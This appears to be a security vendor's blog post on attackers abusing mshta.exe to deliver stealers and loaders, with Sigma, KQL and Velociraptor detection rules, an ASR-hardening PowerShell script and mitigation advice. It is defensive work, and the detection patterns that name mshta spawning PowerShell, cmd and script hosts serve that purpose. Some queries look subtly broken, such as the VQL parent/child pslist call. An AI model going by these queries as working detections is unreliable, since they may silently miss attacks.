Back to Intelligence

MSHTA LOLBIN Abuse: Detecting Silent Stealers and Loaders via Legacy Windows Utility

SA
Security Arsenal Team
May 19, 2026
6 min read

Introduction

Attackers are increasingly weaponizing mshta.exe (Microsoft HTML Application Host), a decades-old Windows utility, to facilitate stealthy malware delivery. Recent intelligence indicates a surge in adversaries abusing this trusted binary to deliver stealers, loaders, and persistent malicious software. By leveraging mshta.exe, attackers bypass basic application allow-listing and security controls, relying on social engineering and fake software downloads to trick users into execution. Defenders must treat this living-off-the-land (LOLBIN) technique with high severity, as it provides a robust vector for initial access and execution that blends in with normal system activity.

Technical Analysis

Affected Platform: All versions of Microsoft Windows (Windows 7 through Windows 11/Server 2022) as mshta.exe is a built-in OS component.

Technique: LOLBIN (T1218.005)

Attack Vector: Attackers utilize mshta.exe to execute .hta (HTML Application) files or JavaScript/VBScript code encapsulated within HTML. The utility is frequently invoked via protocol handlers (e.g., mshta:http://) or by executing a malicious .hta file dropped via fake software installers.

Why It Works: mshta.exe is a signed Microsoft binary, often whitelisted by default in application control policies. It is capable of executing arbitrary script code, making network requests (C2 communication), and loading malicious payloads directly into memory without touching the disk in some cases.

Exploitation Status: Active exploitation is confirmed in the wild. Threat actors use this method to deliver commodity stealers (e.g., RedLine, Vidar) and sophisticated loaders, often chaining it with other LOLBINs to obfuscate the attack path.

Detection & Response

The following detection mechanisms focus on identifying abnormal mshta.exe execution patterns and child process relationships that are uncommon in legitimate business environments.

SIGMA Rules

YAML
---
title: MSHTA Execution with URL Argument
id: 4a3b1c2d-5e6f-4a7b-8c9d-0e1f2a3b4c5d
status: experimental
description: Detects mshta.exe executing with a URL argument, often indicative of remote payload delivery.
references:
  - https://attack.mitre.org/techniques/T1218/005/
author: Security Arsenal
date: 2024/05/20
tags:
  - attack.execution
  - attack.t1218.005
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\mshta.exe'
    CommandLine|contains: 'http'
  condition: selection
falsepositives:
  - Legacy internal applications requiring HTA access
level: high
---
title: MSHTA Spawning Child Process
id: 6b5c1d2e-7f8a-5b8c-9d0e-1f2a3b4c5d6e
status: experimental
description: Detects mshta.exe spawning suspicious child processes like PowerShell or CMD.
references:
  - https://attack.mitre.org/techniques/T1218/005/
author: Security Arsenal
date: 2024/05/20
tags:
  - attack.execution
  - attack.t1218.005
logsource:
  category: process_creation
  product: windows
detection:
  parent:
    Image|endswith: '\mshta.exe'
  child:
    Image|endswith:
      - '\powershell.exe'
      - '\cmd.exe'
      - '\cscript.exe'
      - '\wscript.exe'
      - '\regsvr32.exe'
  condition: parent and child
falsepositives:
  - Legacy internal applications
level: high

KQL (Microsoft Sentinel / Defender)

KQL — Microsoft Sentinel / Defender
// Hunt for MSHTA execution with network arguments or suspicious child processes
let ProcessEvents = DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName =~ "mshta.exe";
// Scenario 1: MSHTA executing with HTTP(s) arguments (Remote Payload)
ProcessEvents
| where ProcessCommandLine has "http" 
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
| extend Detection = "MSHTA Remote Execution"
| union (
    // Scenario 2: MSHTA spawning PowerShell or CMD
    ProcessEvents
    | join kind=inner (
        DeviceProcessEvents 
        | where FileName in~ ("powershell.exe", "cmd.exe", "regsvr32.exe")
    ) on $left.DeviceId == $right.DeviceId, $left.ProcessId == $right.InitiatingProcessId
    | project Timestamp, DeviceName, AccountName, ParentProcessCommandLine = ProcessCommandLine, ChildProcessFileName = FileName1
    | extend Detection = "MSHTA Spawning Suspicious Child"
)
| order by Timestamp desc

Velociraptor VQL

VQL — Velociraptor
-- Hunt for mshta.exe processes and their command line arguments
SELECT Pid, Name, CommandLine, Exe, Username, CreateTime
FROM pslist()
WHERE Name =~ 'mshta.exe'
  AND (
    CommandLine =~ 'http://' 
    OR CommandLine =~ 'https://'
  )
UNION ALL
-- Hunt for mshta.exe spawning suspicious children
SELECT Parent.Name AS ParentName, 
       Child.Name AS ChildName, 
       Child.CommandLine AS ChildCommandLine, 
       Child.Pid AS ChildPid
FROM pslist(parent=pslist())
WHERE Parent.Name =~ 'mshta.exe'
  AND Child.Name IN ('powershell.exe', 'cmd.exe', 'cscript.exe', 'wscript.exe')

Remediation Script (PowerShell)

PowerShell
<#
.SYNOPSIS
    Audit and Harden MSHTA usage.
.DESCRIPTION
    This script audits recent MSHTA usage and enables Microsoft Defender ASR rules
    commonly associated with blocking MSHTA-based attack chains.
#>

Write-Host "[+] Checking for running MSHTA processes..." -ForegroundColor Cyan
$mshtaProcesses = Get-Process -Name mshta -ErrorAction SilentlyContinue
if ($mshtaProcesses) {
    Write-Host "[!] WARNING: MSHTA is currently running:" -ForegroundColor Red
    $mshtaProcesses | Format-Table Id, ProcessName, Path -AutoSize
    Write-Host "[?] Investigate these processes immediately. Terminating suspicious instances requires manual approval." -ForegroundColor Yellow
} else {
    Write-Host "[OK] No MSHTA processes currently detected." -ForegroundColor Green
}

Write-Host "`n[+] Configuring Defender Attack Surface Reduction (ASR) Rules..." -ForegroundColor Cyan

# Ensure Set-MpPreference runs with appropriate privileges
try {
    # ASR Rule: Block Office applications from creating child processes
    # Catches macro-dropped MSHTA execution
    Set-MpPreference -AttackSurfaceReductionRules_Ids "3b576869-a4ec-4529-8536-b80a7769e899" -AttackSurfaceReductionRules_Actions Enabled
    Write-Host "[OK] Enabled ASR: Block Office apps from creating child processes." -ForegroundColor Green

    # ASR Rule: Block Office applications from creating executable content
    Set-MpPreference -AttackSurfaceReductionRules_Ids "d1e49aac-8f56-4280-b9ba-993a6d77475c" -AttackSurfaceReductionRules_Actions Enabled
    Write-Host "[OK] Enabled ASR: Block Office apps from creating executable content." -ForegroundColor Green

    # ASR Rule: Block JavaScript or VBScript from launching downloaded executable content
    Set-MpPreference -AttackSurfaceReductionRules_Ids "BE9BA2D9-53EA-4DCF-8329-D1A660D529FB" -AttackSurfaceReductionRules_Actions Enabled
    Write-Host "[OK] Enabled ASR: Block JS/VB launching downloaded executables." -ForegroundColor Green
} catch {
    Write-Host "[ERROR] Failed to set ASR rules. Ensure running as Administrator and Defender is enabled." -ForegroundColor Red
    Write-Host $_.Exception.Message
}

Write-Host "`n[+] Hardening Complete." -ForegroundColor Cyan

Remediation

1. Application Control (AppLocker/WDAC): The most effective mitigation is blocking mshta.exe entirely via Windows Defender Application Control (WDAC) or AppLocker. In most modern enterprise environments, mshta.exe is rarely required for legitimate business functions. Create a rule to deny execution of %windir%\System32\mshta.exe for standard users.

2. Attack Surface Reduction (ASR) Rules: Enable the following Microsoft Defender ASR rules immediately to disrupt common infection chains:

  • Block Office applications from creating child processes (GUID: 3b576869-a4ec-4529-8536-b80a7769e899)
  • Block Office applications from creating executable content (GUID: d1e49aac-8f56-4280-b9ba-993a6d77475c)
  • Block JavaScript or VBScript from launching downloaded executable content (GUID: BE9BA2D9-53EA-4DCF-8329-D1A660D529FB)

3. User Awareness: Since this vector relies heavily on social engineering and fake software downloads, reinforce user training regarding the risks of downloading software from unofficial sources and opening unexpected attachments.

4. Network Monitoring: Monitor and block outbound connections from mshta.exe to non-corporate IPs, as the utility rarely requires direct internet access in standard operations.

Related Resources

Security Arsenal Penetration Testing Services AlertMonitor Platform Book a SOC Assessment vulnerability-management Intel Hub

sigma-rulekql-detectionthreat-huntingdetection-engineeringsiem-detectionlolbinmshtawindows-security

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action